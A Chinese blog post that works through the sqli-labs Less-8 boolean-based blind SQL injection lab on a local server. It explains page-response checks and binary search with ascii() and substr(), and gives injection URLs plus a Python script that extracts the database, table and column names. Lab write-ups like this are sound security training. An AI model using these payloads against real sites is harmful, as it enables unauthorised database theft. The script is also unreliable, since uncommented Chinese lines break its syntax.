GET_Blind_Boolian Based-single Quetes

最新推荐文章于 2022-03-11 16:12:20 发布
最新推荐文章于 2022-03-11 16:12:20 发布
阅读量202 收藏
点赞数
分类专栏: 注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46601529/article/details/108783841
版权

在这里插入图片描述

1.首先盲注是一般都是通过页面变化来判断是否存在注入
1)当传入数据正常时 url?id=1’ and 1=1 %23
在这里插入图片描述
2)当传入数据不正常时 url?id=1’ and 1=2 %23
在这里插入图片描述显而易见少了一个 “YOU ARE IN”

那么就很好办,我们就可以就构建payload

2.盲注一般利用 ascii(),substr()

ascii()将字符串转化成ascii码

substr(string,start,length)将字符串截取,第一个参数start从1开始不是0

group_concat()将一个组的内部数据以逗号分隔列出来


3.解析一下·ttp://127.0.0.1/Less-8/?id=1%27%20and%201=2%23

1.SELECT * FROM users WHERE id='1' and 1=2#' LIMIT 0,1这是内部语句
?id=1'这个单引号是为了引入新的语句也就是我们的注入,完整的是一对单引号,但因为添加新的语句,我们又引入的新的单引号,那么后面单引号我们就用%23注释掉这样我们就又恢复一对单引号

4.接下来就是构造爆数据库
1.http://127.0.0.1/Less-1/?id=1%27%20and%20ascii(substr(database(),1,1))%3E97%20%23
在这里插入图片描述利用二分法猜第一个数据库的第一个字母的ascii大于97,页面显示正常
接下来继续猜,在英文字母中猜

英文和数字的ascii码
a-z:97-122,

baiA-Z:65-90

0-948-57

2.猜数据库的第一ascii小于123发现页面显示正常,因此根据区间可以确定是小写英文,继续利用二分法

在这里插入图片描述3又继续猜小于116还是正常

在这里插入图片描述

4.当猜到115是发现页面报错,这时我们估计这个就是115而115的ascii码是s
在这里插入图片描述以此类推,将剩些的字母猜出来,因为它们的操作都一样反复,我们可以写个脚本代替这些机械动作

import requests 

       
flag=""
for i in range(1,60):
    for j in range(1,130):
        url="http://127.0.0.1/Less-1/?id=1%27%20and%20ascii(substr((select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27emails%27),{},1))={}%20%23".format(i,j)
        上面这个url是用来猜解列表的
        # url= "http://127.0.0.1/Less-1/?id=1%27%20and%20ascii(substr(database(),{},1))={}%20%23".format(i,j)
        这个是用来猜解数据库的
        # url="http://127.0.0.1/Less-1/?id=1%27%20and%20ascii(substr(%20(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=database()),{},1))={}%20%23".format(i,j)
        这个是用来猜解数据表的
        response=requests.get(url)
        if "You" in response.text:
            flag=flag+chr(j)
            print(flag)

这三个猜解的payload分别是
1.列http://127.0.0.1/Less-8/?id=1%27%20and%20ascii(substr((select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27emails%27),1,1))=105%20%23

2.数据库http://127.0.0.1/Less-1/?id=1%27%20and%20ascii(substr(database(),{},1))={}%20%23".format(i,j)

3.数据表http://127.0.0.1/Less-1/?id=1%27%20and%20ascii(substr(%20(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=database()),{},1))={}%20%23".format(i,j)

one_菜鸡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs Less-8 Blind-- Boolian Based基于布尔的盲注
bigblue00的博客
06-16 412
Less-8 Blind-- Boolian Based基于布尔的盲注 1、回显分析 当输入的语句正确时,显示 You are in… 当输入的语句异常时,不显示任何信息 2、SQL盲注 根据页面的显示情况会有不同,可以构造判断语句,当语句成立时,显示You are in… 当语句不成立时,不显示任何信息。 先判断数据库名的长度: http://192.168.195.110/sqli-labs/Less-8/?id=1’and (length(database())>10) – + 页面无信息显示,
sqli-lab教程——less-15 POST - Blind- Boolian/time Based - Single quotes (基于bool型/时间延迟单引号POST型盲注)
luosaierdadi的博客
07-09 315
盲注 - 基于布尔值 - 字符串怎么输入都没有回显,那就时间延迟吧。布尔测试payloaduname=admin' and 1=1 --+&passwd=admin&submit=Submit //登陆成功 uname=admin' and 1=2 --+&passwd=admin&submit=Submit //登录失败 时间延迟测试payloaduname=admin' and sleep(5) --+&passwd=admin&submit=Submit 明显延迟,确定使用延迟注入。手工延
【sqli-labs】 less8 GET - Blind - Boolian Based - Single Quotes (基于布尔的单引号GET盲注)...
ajxi63204的博客
01-19 327
加单引号 没有任何信息输出 加and 页面变化,不正常是没有任何回显 http://localhost/sqli/Less-8/?id=1' and '1'='1 http://localhost/sqli/Less-8/?id=1' and '1'='2 出错也没有回显,考虑盲注,即通过不同请求页面的变化来作出判断 首先学习几个函数 length(s...
【SQLi-Labs】Less-8 Blind- Boolian- Single Quotes- String
xw1995115的博客
11-17 3522
本节来练习一下布尔盲注。 有时候,对目标网站进行注入会有这样的情况,对于用户的输入,页面不会有报错提示,只会有两种结果: 1.目标页面有内容(证明用户的输入正确有效) 2.目标界面没有内容(证明用户的输入无效,或页面将要显示的不是开发者想要给用户看的内容) 总结一句话就是,在某些时候服务器只会反馈你“说”的对不对,也就是判断你的输入为“真”或者为“假”。 这时候就要用到布尔盲注来“猜”或者“骗”服务器说出“真话”。 多说无益,实战来叙。 1.在SQLi-Labs Less-8中,添加参数...
GET-Blind-Time based-double quotes(基于双引号的盲注) Less-10
water0diamond的博客
03-13 305
首先我们可以看一下主页 我们试一下看, 有了前面几关的基础后我们可以这样试一下 http://127.0.0.1/Less-10/?id=1' and if(ascii(substr(database(),1,1))>115, 0, sleep(5)) %23 然后发现返回的页面 在试一下 http://127.0.0.1/Less-10/?id=1'and if...
sqli-labs Less8~10 布尔盲注、时间盲注(无报错回显)
双子叶mm的博客
10-22 747
1. Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注) 判断是否存在数字型或字符型注入: 输入1,页面显示正常: 输入1’ and 1=1时显示正常: 输入1’ and 1=2时显示异常: 说明存在字符型的SQL盲注。 Less-8和Less-5的区别在于,Less-8对报错语句进行了注释,所以无法使用显错式注入,只能用盲注。 1.猜解数据库名长度: 输入1' and length(database()) = 5 --+,
小符sqli_labs1~65关的方法与感悟
fuyingyinger的博客
02-07 758
什么是SQL注入呢? SQL在管理数据库时,往往通过拼接的方式形成一个数据库语言,在拼接SQL语句的时候,可以通过改变SQL语句,让数据执行我们想要的语句,着同样也是危险的存在 开始前的心理准备 我真的是一脸懵啊,虽然前面也大致学过一些SQL语句,但是真当实践起来,还是懵的要死,还是多亏了学长给的资料sql注入天书还有找了找学长的博客才大致了解了这是什么东西,废话就不多说啦,冲冲冲! Page—1(Basic Challenges) Less-1 Get-Error based-Single quotes-
sqli-labs靶场练习笔记13-18
m0_47693317的博客
05-24 147
sqli-labs13-18Less-13:POST-Double Injection-Single quotes-String-with twist(基于POST的变形单引号字符型双注入)Less-14:POST-Double Injection-Single quotes-String-with twist(基于POST的变形单引号(双引号)字符型注入)Less-15:POST-Blind-Boolian/time Based-Single quotes(基于POST的单引号布尔/时间盲注)Less-1
当黑客就入门 SQLi-Labs 1-20 详细攻略
Tuye的博客
07-15 1225
SQLi-Lab 攻略13123
sqli-lab学习笔记
XQin9T1an的博客
08-02 322
1
sqli-labs练习(八)------GET-Blind-Boolian Based-Sing Quotes
wkend的博客
04-26 548
输入1,回显You are in........... 输入1',没有回显 sql基于布尔的盲注 相关函数 函数 作用 length(str) 返回字符串str的长度 substr(str, pos, len) 将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的,不是数组的0开始 mid(s...
Sqli-Labs靶场(6--10)题详解
weixin_46099095的博客
03-11 2307
六、Less-6:GET - Double Injection - Double Quotes - string(GET - 双重注入 - 双引号 - 字符串) 此题解法与Less-5类似 只需判断注入点时使用?id=1"-- + 附上Less1-Less5题解 https://blog.csdn.net/weixin_46099095/article/details/123399846?spm=1001.2014.3001.5502 七、Less-7:GET - Dump into outfil
靶场笔记之sql注入石器篇1
快乐时光
04-22 539
前言 偶然发现了https://redtiger.labs.overthewire.org/网站,上面有关于sql注入的练习,分level1到level10,可依次进行练习。 本篇先介绍level1至level5的题目,可动手操作起来。 level 1 点击level 1进入https://redtiger.labs.overthewire.org/level1.php页,尝试了username和passwd没有发现任何问题,后来发现网站上有个Category:1的可...
SQL Injection - Blind - Boolean-Based注入思路
****的博客
08-21 3717
靶机:bWAPP bug:SQL Injection - Blind - Boolean-Based 难度等级:low 这是基于布尔型的盲注。首先使用“Man of Steel”、“Man of Steel' and 1=1#”测试发现,返回的信息都为“The movie exists in our database!”,当输入“Man of Steel' and 1=2#”,返回 “The...
sqlilabs1-20详细教程
黑白的博客
10-06 8210
声明 学习SQL注入 information_schema 过关之前先要了解一下,我们要研究的是SQL注入,所以有必要先了解一下MYSQL数据库的重要库(表集合):information_schema,这个库中,存在着所有数据库的信息。。。这就意味着,如果我们可以利用漏洞,仅仅去查询这个库,就可以拿到关于数据库的大量信息了。 先看一下,这个数据库的位置 SCHEMATA 该表记录着所有的数据库名 图中,mysql命令行输入如喜爱命令,会显示目前为止所有的数据库(图左1) show databases;
2024-2030全球与中国硅胶婴儿用品市场现状及未来发展趋势 Sample-Li Jinpan.pdf
09-05
QYResearch是全球知名的大型咨询公司,行业涵盖各高科技行业产业链细分市场,横跨如半导体产业链(半导体设备及零部件、半导体材料、集成电路、制造、封测、分立器件、传感器、光电器件)、光伏产业链(设备、硅料/硅片、电池片、组件、辅料支架、逆变器、电站终端)、新能源汽车产业链(动力电池及材料、电驱电控、汽车半导体/电子、整车、充电桩)、通信产业链(通信系统设备、终端设备、电子元器件、射频前端、光模块、4G/5G/6G、宽带、IoT、数字经济、AI)、先进材料产业链(金属材料、高分子材料、陶瓷材料、纳米材料等)、机械制造产业链(数控机床、工程机械、电气机械、3C自动化、工业机器人、激光、工控、无人机)、食品药品、医疗器械、农业等。
用于非线性模型预测控制 (NMPC) 的并行优化工具包.7z
09-05
用于非线性模型预测控制 (NMPC) 的并行优化工具包.7z
Flow-Guided-Feature-Aggregation研究基于视频的目标检测FGFA框架.zip
最新发布
09-05
目标检测(Object Detection)是计算机视觉领域的一个核心问题,其主要任务是找出图像中所有感兴趣的目标(物体),并确定它们的类别和位置。以下是对目标检测的详细阐述: 一、基本概念 目标检测的任务是解决“在哪里?是什么?”的问题,即定位出图像中目标的位置并识别出目标的类别。由于各类物体具有不同的外观、形状和姿态,加上成像时光照、遮挡等因素的干扰,目标检测一直是计算机视觉领域最具挑战性的任务之一。 二、核心问题 目标检测涉及以下几个核心问题: 分类问题:判断图像中的目标属于哪个类别。 定位问题:确定目标在图像中的具体位置。 大小问题:目标可能具有不同的大小。 形状问题:目标可能具有不同的形状。 三、算法分类 基于深度学习的目标检测算法主要分为两大类: Two-stage算法:先进行区域生成(Region Proposal),生成有可能包含待检物体的预选框(Region Proposal),再通过卷积神经网络进行样本分类。常见的Two-stage算法包括R-CNN、Fast R-CNN、Faster R-CNN等。 One-stage算法:不用生成区域提议,直接在网络中提取特征来预测物体分类和位置。常见的One-stage算法包括YOLO系列(YOLOv1、YOLOv2、YOLOv3、YOLOv4、YOLOv5等)、SSD和RetinaNet等。 四、算法原理 以YOLO系列为例,YOLO将目标检测视为回归问题,将输入图像一次性划分为多个区域,直接在输出层预测边界框和类别概率。YOLO采用卷积网络来提取特征,使用全连接层来得到预测值。其网络结构通常包含多个卷积层和全连接层,通过卷积层提取图像特征,通过全连接层输出预测结果。 五、应用领域 目标检测技术已经广泛应用于各个领域,为人们的生活带来了极大的便利。以下是一些主要的应用领域: 安全监控:在商场、银行
习题集计算机原理习题集
09-05
【习题集】计算机原理习题集 计算机原理习题集 习题 一 1.微型计算机的发展经历了哪几个时代?每个时代有哪些主要特点? 2.简述Pentium4 微处理器的处理能力。 3.冯·诺依曼计算机的结构特点是什么? 4.典型微机有哪三大总线?它们传送的是什么信息? 5.什么叫微处理器?什么叫微型计算机?什么叫微型计算机系统?这三者有什么区别和联系? 6.微处理器内部一般由哪些部分组成?各部分的主要功能是什么? 7.试用示意图说明内存单元的地址和内存单元的内容,二者有何联系和区别? 8.高级语言、汇编语言、机器语言有何区别?各有何特点? 9.评价微型计算机性能的主要指标有哪些?试举例说明现在市场主流机型微型计算机的性能参数。 10.现代微型计算机的主板通常由哪些部分组成?主板上的总线扩展插槽有何用途? 习题 二 1.8086CPU从功能上分为哪两个工作部件?每个工作部件的功能、组成和特点分别是什么? 2.8086CPU中有几个通用寄存器,有几个变址寄存器,有几个地址指针寄存器?它们中通常哪几个寄存器可作为地址寄存器使用? 3.8086CPU的标志寄存器中有哪些标志位?它们的含义和作用是什么?
sqlmap pikachu
08-17
基于Windows系统,并选择盲注(base on boolian)的方式,可以使用以下命令获取有关pikachu数据库的信息: pikachu--SQL-Inject 请注意,这只是一个示例命令,实际情况中需要根据具体的注入测试情况进行相应的调整和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值